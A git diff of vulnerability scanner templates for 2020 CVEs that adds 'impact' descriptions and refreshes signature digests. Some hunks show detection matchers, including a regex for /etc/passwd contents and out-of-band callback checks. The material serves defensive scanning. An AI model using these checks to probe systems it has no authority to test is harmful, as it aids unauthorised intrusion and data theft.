@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Apply the latest patch or upgrade to a version that is not affected by the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022062382b822cc72b263bf244a0f14964a1bc54d1bac702e964ae7684f5c504eee60220484371aa1c7e4008343d0ca92d775463d6bbb3a92d5e250e399d20d08d7d6ea5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022027e83951fde47cabc7fc92c89de29e93f8bcdf99e4f6472f280cf4d194643b32022100bda87cecb0af216f7a132697121fe2991fc6564ed6e4a51a2a1f3cb58356bf7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml
index 8e06bc338e..d8632c4855 100644
--- a/http/cves/2020/CVE-2020-25780.yaml
+++ b/http/cves/2020/CVE-2020-25780.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: high
   description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.
   remediation: |
     Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fe3cd4a044bdd2c45cd3ff1a400b776d3e0df386d214ceda69fd97fc1d0e561402210089fb6cd14175584e84f5cb13ab5c6e496347692b108300aaa4206eba9c85a88f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f17f2ec006c552296545fc45125945cbcf01a966445432c9f688428ec7f7bfa00220729ab81179ef908f73f7bc039b352b04ba1ac436639f11904f6d8ede9ba5be0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml
index dddb41077b..e2d78730c1 100644
--- a/http/cves/2020/CVE-2020-25864.yaml
+++ b/http/cves/2020/CVE-2020-25864.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Consul/Consul Enterprise application.
   remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14.
   reference:
     - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022026cfb82aa7cd028be9d16142ccea12c493d1ce1be52170180742b17f5ab13968022100ff55c4c58fb14fc6504dcf3b738a7855e177b8c520e5ec71299174064c9e02c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022072b7f8741214eeeed089c32d025433a2d2ea35f39d8b85a3d5b246f76ad0f2ed02201a86e7f9f62ab79e8f59582c0041591a0d14ed24fc44a5e64dccdb6537f1cf4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml
index 0ad222278b..8a11657804 100644
--- a/http/cves/2020/CVE-2020-26073.yaml
+++ b/http/cves/2020/CVE-2020-26073.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the affected system.
   remediation: |
     Apply the latest security patches provided by Cisco to fix the vulnerability.
   reference:
@@ -32,5 +34,4 @@ http:
         regex:
           - "root:.*:0:0:"
         part: body
-
-# digest: 4b0a0048304602210093b5325073f2c8cc6afd564686b47d297156183c850c1bd644f37e142ab542cf022100df13c84724cfdc148ed72097e25053bc533f89889ef1eecf91d114ba505f5673:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022039766848e039513d1de75fa4526a5cd9bd3ee54b8e0204e824e5e3f2a4abd8340221008795b9f415bd03ded961e86016a7a3f2d3546ccc02c4aa1b9afaf7550bb1adbc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml
index 97e4c301e1..c8bfac028f 100644
--- a/http/cves/2020/CVE-2020-26153.yaml
+++ b/http/cves/2020/CVE-2020-26153.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
   remediation: |
     Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022100f1ae9fecfe4b74189f637caff74283ef6fa63c3f1b3c2a390d7666926e37ef9102200fdb02abd1225e932bdb32ac23ffcef5b35a9f4bbc2a462b173708c161cf3321:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a536bb1b1cdeab08bd2e3531b3e5d82b0bd4d4e9f11d9dc459ee6112a5c32e4d022100c97bd9b5961a06dac4188dc97dba362421ba747f190cc568a1bed7ffbae478f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml
index 4c7e88f912..67cd25d22c 100644
--- a/http/cves/2020/CVE-2020-26214.yaml
+++ b/http/cves/2020/CVE-2020-26214.yaml
@@ -5,6 +5,8 @@ info:
   author: CasperGN,daffainfo
   severity: critical
   description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to Alerta.
   remediation: |
     Upgrade Alerta to version 8.1.0 or later to mitigate this vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         group: 1
         regex:
           - '"name": "Alerta ([0-9.]+)"'
-# digest: 490a00463044022029ef8a10cacf45755b2a926c21a9725a03f04ecdce6d3731b4bdeee6a4d2cc28022032974c5c650f8c8ca23d793e575a58850bac6272f205a72dfe3af6e80bfe4c72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203fdfabf3a968b10a93737d44c1037bd5d740d9b55f9a250799b8b7d8a6973baa0220553825a66f463c36a3c1ecfb57b8ddb8a2fa4b230be712967646b0e69b311f92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml
index b0a8d19906..74e8b94a62 100644
--- a/http/cves/2020/CVE-2020-26217.yaml
+++ b/http/cves/2020/CVE-2020-26217.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     XStream before 1.4.14 is susceptible to remote code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: Fixed in 1.4.14.
   reference:
     - https://x-stream.github.io/CVE-2020-26217.html
@@ -99,4 +101,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4b0a00483046022100a2782812e76189c1678131769bab71523123924348e3cb737091d82a61d31190022100c4ae154cb21235ccf3aed2860be18c48ebb6ac58ed13112e850424c2e7f53b6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206c42cbd7ad6e66940f5dd0a1a629e9dd477d53ff0f44ed6510fc858e840127b00220544ad4ac633e4bcbd4ad09b2db68ac504a35148e3380b67d50d44da7999ff01b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml
index 7d0c75d332..7963860e49 100644
--- a/http/cves/2020/CVE-2020-26248.yaml
+++ b/http/cves/2020/CVE-2020-26248.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in 4.2.1.
   reference:
     - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
@@ -44,4 +46,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "average_grade")'
         condition: and
-# digest: 490a00463044022060f3e14821e1fa5c9b150113610a92a7cf151ab6b078339c413dfb8ceb511fbd02206aeba16b3a3c1bd775f4b8c25de691cd00b6e2ed073b97c4ec157a10f4ff2192:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009325c0c4418aaefa15fed8f4ecccc01658d06f992217774599cb2c0c110032d5022100e8e95066dbf535f78f2118bcffb64d96993ef16e898bc6a77a48edc72a3dbecb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml
index e85318900c..5cee145e28 100644
--- a/http/cves/2020/CVE-2020-26258.yaml
+++ b/http/cves/2020/CVE-2020-26258.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to data leakage or further attacks.
   remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher.
   reference:
     - https://x-stream.github.io/CVE-2020-26258.html
@@ -63,4 +65,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: Java"
-# digest: 4a0a0047304502200ea3b048952afd8720507f663a9a31ef81efb16e075878f2fe6c204476ac95df022100fd1c0749621f35fff11ce9fb362ccf30cf4c00839df7b76469b60e8f55ed2e43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d165dd84f4f556258d646dbe1b8dfc9c8fa3b85b821a1a3efedee4c9f0c43849022058ff9f62193087bedafb49ce633da3454196dfed27b8b38310a2259e3a06b1e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml
index fd85da6428..f8fce4ad5c 100644
--- a/http/cves/2020/CVE-2020-26413.yaml
+++ b/http/cves/2020/CVE-2020-26413.yaml
@@ -5,6 +5,8 @@ info:
   author: _0xf4n9x_,pikpikcu
   severity: medium
   description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can gain unauthorized access to sensitive information.
   remediation: |
     Upgrade Gitlab CE/EE to version 13.6.3 or later.
   reference:
@@ -59,4 +61,4 @@ http:
         json:
           - '.data.users.edges[].node.email'
         part: body
-# digest: 4b0a00483046022100ca425d978c27deac50530aff3883c51c506765f9f8d3214a1d89a39005e79a86022100b9f67727ac048c8c9a929da1ff6ffcda05b64a20d8a690649b2e4b278d697a39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202fc17d5ae353fc7eb4850788b3f56a36dd08b600bfcb2d738b89626f8ce81f7d02207423f92465d421a1cc2cb2e72ab455fb4ead2ffba421c08d6220381d74fdaa31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml
index 81676623db..a505e29379 100644
--- a/http/cves/2020/CVE-2020-26876.yaml
+++ b/http/cves/2020/CVE-2020-26876.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: high
   description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin.
   remediation: |
     Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - 200
           - 404
         condition: or
-# digest: 4a0a0047304502210089f5ac60d9ad08a548c6e07fa4060d48f56e4f070f770dff137c5e5d6bf5fd9202205f1dd47f26c5a0123a6b87ffce15d651dbaa2cfc8c10622901309851a27f9e92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008b17339d46093279799970e2c6046735596cef540536f924085cac335a5fe361022100b0064e9c8fbf7790b0da0c4caa39516568a208966fb99897457b19ad124233be:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml
index 0454fffbbb..6139c0e9aa 100644
--- a/http/cves/2020/CVE-2020-26919.yaml
+++ b/http/cves/2020/CVE-2020-26919.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: NETGEAR ProSAFE Plus  before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
   remediation: |
     Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 490a0046304402202a9ec9fee45515d85d7ef83f61e20005124efefee5ed38635c7a2e510da2562f0220539d20425fec66d40df0e9db7ec969ccaa5fb7f03089cf783b235778a0a35992:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009c12db0b804ac56c7e3af55a8f8a905f980d3efc95bf4e932383da7b83b79a4c02201463c175d7994fd223cf91cd945b2cc7f0e20fbd3d7eea0de5a75d7cf432b422:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml
index fc4d554faa..ff555fe689 100644
--- a/http/cves/2020/CVE-2020-26948.yaml
+++ b/http/cves/2020/CVE-2020-26948.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
+  impact: |
+    An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Emby Server.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4b0a0048304602210087a8e7939d77f69efb22d5cf3b1660456264bdc51ca5b6172beff6cec319c7f1022100832f75f27ed22da7e61f33a3760c5f40885771ff0adac9d007316f9fb774db94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a88aa7c2f8a443e601f64fe9fcbbe8e3de96f20eef5d1496f7967b8fc7ed6fcd022036a9b07693a53c557873cdf92be042f4c09f46445999541a1d5ba6bf9131bf58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml
index a029e5a738..dc9e9ef52c 100644
--- a/http/cves/2020/CVE-2020-27191.yaml
+++ b/http/cves/2020/CVE-2020-27191.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
   remediation: |
     Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b9672211b6945d3a41afea3e9aa35a2d6da51331896976685e440ee4b3209909022100f472c9127b591dda4c0e4bf279e2f0ca7e7e4010a4c23734653c51db85fc116d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204cb0ce6298308ecd629332885d79a0219af29b6d49e7863ac2e1e03b76b74698022100e3343c6027145097d1db991f04390aee6b72a41235586d9a6cbc141748fe5712:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml
index 030760f679..254e368b75 100644
--- a/http/cves/2020/CVE-2020-2733.yaml
+++ b/http/cves/2020/CVE-2020-2733.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220202294334cfe1ae932439b252e9e78e6842e38a61d4dc949780a0a2222c981f5022100afbe0bfeabc8615528f2fbfbd6e13c7a0af53915e7eabc2c63a2cc9e1b6d39b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100811eaa1d4888a7da1cccce9bc35597360ce5ee871b46dd694a1bdce99d7c8483022100f596cf3d47e87ce6c4e6f21a4a98dd6bf90fa8f5812c7aa1e5e2089dff048d0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml
index 7a16fd7c5c..77178bd935 100644
--- a/http/cves/2020/CVE-2020-27361.yaml
+++ b/http/cves/2020/CVE-2020-27361.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
   remediation: |
     Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b89e3cb966273f9c1bbd2cb0ff8a813ab6ce729f69f391f3c6082b25d6c4f35a022100a7cfc6699d610b71f0b4073aab648188839f9949fd6c103ae5b9e67c8bb3c03a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200cc96d5cc4c87e04822568ef2c99b506eff5d4a0613e6b9dc633504cdd331077022100c9e467540a24239827d1e54d7a0cdac3507807e366f473c9da9a24148c8b7067:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml
index 4dbbe7ffb2..51e76f86c5 100644
--- a/http/cves/2020/CVE-2020-27467.yaml
+++ b/http/cves/2020/CVE-2020-27467.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.
   remediation: |
     Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207602150ba0dbe2cd985f8903a06a3edebf96938c8fd7940699f12303c0cc6a26022008f92137de87758ef026ba62490a7777a8a1b532cd392bc1f633a82533c1531c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bc0e2c53446fe323e26c97b8a679db2bed9b066484c1cc1a482f886aca80ab1c022100829503a957e58886e356de27666dac5fee3a40a62c36b3c58b47b6ea2f8142ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml
index 8feb9c54c1..597ea1cebb 100644
--- a/http/cves/2020/CVE-2020-27481.yaml
+++ b/http/cves/2020/CVE-2020-27481.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - "status_code == 200"
           - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"
         condition: and
-# digest: 490a0046304402205dd2fb537a1d4697981f389dd1cbafa82d9f65e60343391acb3fe26bd2dd6f1b02203307bda4b17e288033c9bac4dfc7e532cd3eb36a610076159fa6c8a0e1caaf99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203505669f4272c9c33858e007375ec2feaa8f29d2184f72b5c844df308c61668c02207bb04893a342cfb63dfe9fde2036e87995a6da8b4a198605b9a6caf98a34d1e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml
index baf7066c4c..6e4052898e 100644
--- a/http/cves/2020/CVE-2020-27735.yaml
+++ b/http/cves/2020/CVE-2020-27735.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009d8d0dfa9eda31a237d102e6313455741dddfae4ca53d3fba71432c1ff605372022000e79a3d46f78a535f3b456a84855b654456c8c375894114884d8e22769c24e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d691b306b89943c502992a0b7bcc3e2e0e08e23d2158f43cde676ff1467b5b2b022021b00e0acaf8c78ba0b201f94ccb23cbc5daf877bfeb96106497ec211a176974:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml
index ac14833042..0d55d0544a 100644
--- a/http/cves/2020/CVE-2020-27866.yaml
+++ b/http/cves/2020/CVE-2020-27866.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify network configurations, intercept traffic, or launch further attacks.
   remediation: |
     Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200a2ab67663076bfa24b6c2b113f54d86e8d08d938bf5b4c2158826071a6e03c3022045163206c1018923e39ef97ad8192cb7b8f5b93aeccab33619cc8ff138c13b68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008709777e8f5a47f0f76f73d7db72f1cab311e7320a9ea21b06d5fde945826ad0022100e0f5a6fd67c59bc2fe64400bd0b5affb5e9cbde3fb726129254dbf21cca7c66a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml
index 1058efbc89..8dd0bc1273 100644
--- a/http/cves/2020/CVE-2020-27982.yaml
+++ b/http/cves/2020/CVE-2020-27982.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203895385db32b49cdbc266e148d4e62a9ee68a4235e6c289d6c3e7d06595ccf9202207d5c12e707f41e10f00d577b81fd31b64e27b67e1277c3133048eccf6d161006:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022078dfe1b4425603915905987a4cbc83db219503932a814ba7eb5ddb40be92b404022100f559096110c1dd7e6ebc22cb7602ea02328163ff336b1d088efd6ee79c795e5b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml
index f91ea92be1..1617f98813 100644
--- a/http/cves/2020/CVE-2020-27986.yaml
+++ b/http/cves/2020/CVE-2020-27986.yaml
@@ -7,6 +7,8 @@ info:
   description: |
     SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
     SVN, and GitLab credentials via the api/settings/values URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.
   remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
   reference:
     - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f80847cd15f3361e43dc5a17a98fab2845e5eae4dd613a814a71567fa72dbcf70221008f089365dc32abd20879576695856064c97a11af3d5bb8c83d8329ee04ea11d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022073b18ccec7f4d8191d722ff45cd260ab11b91fbf1aeb1017724b90445437ed550220572f1a29e5b61d8a17bb30b5f9609a773779488bbdbc652ad9a9659e1cbe0b4f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml
index c24346e6fe..dc1a4e51ad 100644
--- a/http/cves/2020/CVE-2020-28185.yaml
+++ b/http/cves/2020/CVE-2020-28185.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
+  impact: |
+    An attacker can enumerate valid usernames, potentially aiding in further attacks.
   remediation: |
     Upgrade TerraMaster TOS to version 4.2.06 or later.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - '"username":"(.*?)"'
           - '"email":"(.*?)"'
-# digest: 490a0046304402206e7dec954f82149101fcfeb569b7d66044f2257e7ef5e148278d215e44c4896102204cf77aab0f0a6adaa07db0ee5e8257063cde35690dedd6d5ce8ede56a96a9546:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e39b4939a3a39f1ac3eec01da26b8b60007494c5bb2dfeaa2b5929b1f2c3f46902206a4a19540f0cbe3b6d5801a1c2980425f2817e1e3ed7a305abe4226b5569833f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml
index 758898ffc4..1507fb28c9 100644
